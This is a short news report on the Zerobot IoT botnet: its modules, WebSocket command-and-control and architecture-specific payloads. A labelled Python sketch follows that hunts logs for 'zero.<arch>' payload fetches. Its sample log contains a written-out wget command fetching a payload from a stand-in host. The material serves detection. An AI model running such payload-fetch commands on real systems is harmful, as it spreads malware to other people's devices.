
A novel Go-based botnet called Zerobot has been observed in the wild, proliferating by taking advantage of nearly two dozen security vulnerabilities in Internet of Things (IoT) devices and other software.

The botnet “contains several modules, including self-replication, attacks for different protocols, and self-propagation,” Fortinet FortiGuard Labs researcher Cara Lin said. “It also communicates with its command-and-control server using the WebSocket protocol.”

The campaign, which is said to have commenced after November 18, 2022, primarily singles out Windows and Linux operating systems to gain control of vulnerable devices.

Zerobot gets its name from a propagation script that is used to retrieve the malicious payload after gaining access to a host. The payload it fetches depends on the host's microarchitecture implementation (e.g., “zero.arm64”).

The malware is designed to target a wide range of CPU architectures such as i386, amd64, arm, arm64, mips, mips64, mips64le, mipsle, ppc64, ppc64le, riscv64, and s390x.
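The payload naming gives defenders something to hunt for in proxy or process-execution logs. The sketch below is an added example, not code from the article or from Fortinet: the log layout, hostnames, dates and addresses are constructed, and extending the “zero.<arch>” pattern from the article's single example to every listed architecture is an assumption.

```python
import re
from collections import defaultdict

# Architectures listed in the article.
ARCHES = ("i386", "amd64", "arm", "arm64", "mips", "mips64", "mips64le",
          "mipsle", "ppc64", "ppc64le", "riscv64", "s390x")

# Assumption: payloads follow the "zero.<arch>" naming of the article's one
# example ("zero.arm64"). Longest names first so "arm64" is tried before "arm".
_ALT = "|".join(sorted(ARCHES, key=len, reverse=True))
# Boundary checks avoid hits on names such as "subzero.arm" or "zero.armv7".
PAYLOAD_RE = re.compile(r"(?<![\w.-])zero\.(" + _ALT + r")(?![\w.-])",
                        re.IGNORECASE)

# Constructed sample lines: "<timestamp> <host> <message>".
SAMPLE_LOG = """\
2022-12-07T10:01:02Z cam-17 GET http://203.0.113.5/zero.arm64 200
2022-12-07T10:01:09Z nas-02 sh -c "wget http://203.0.113.5/zero.mips64le -O /tmp/x"
2022-12-07T10:02:00Z web-01 GET http://example.com/subzero.arm 200
2022-12-07T10:02:30Z web-01 GET http://example.com/zero.armv7.tar.gz 200
2022-12-07T10:03:00Z cam-17 GET http://203.0.113.5/zero.ARM 200
malformed-line
"""

def find_payload_fetches(lines):
    """Return {host: sorted list of architectures} for matching log lines."""
    hits = defaultdict(set)
    for line in lines:
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue  # skip lines that do not fit the assumed layout
        _timestamp, host, message = parts
        for match in PAYLOAD_RE.finditer(message):
            hits[host].add(match.group(1).lower())
    return {host: sorted(arches) for host, arches in hits.items()}

if __name__ == "__main__":
    for host, arches in find_payload_fetches(SAMPLE_LOG.splitlines()).items():
        print(f"{host}: possible Zerobot payload fetch for {', '.join(arches)}")
```

A match is a lead for triage rather than proof of infection, since a filename is trivial for an operator to change.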
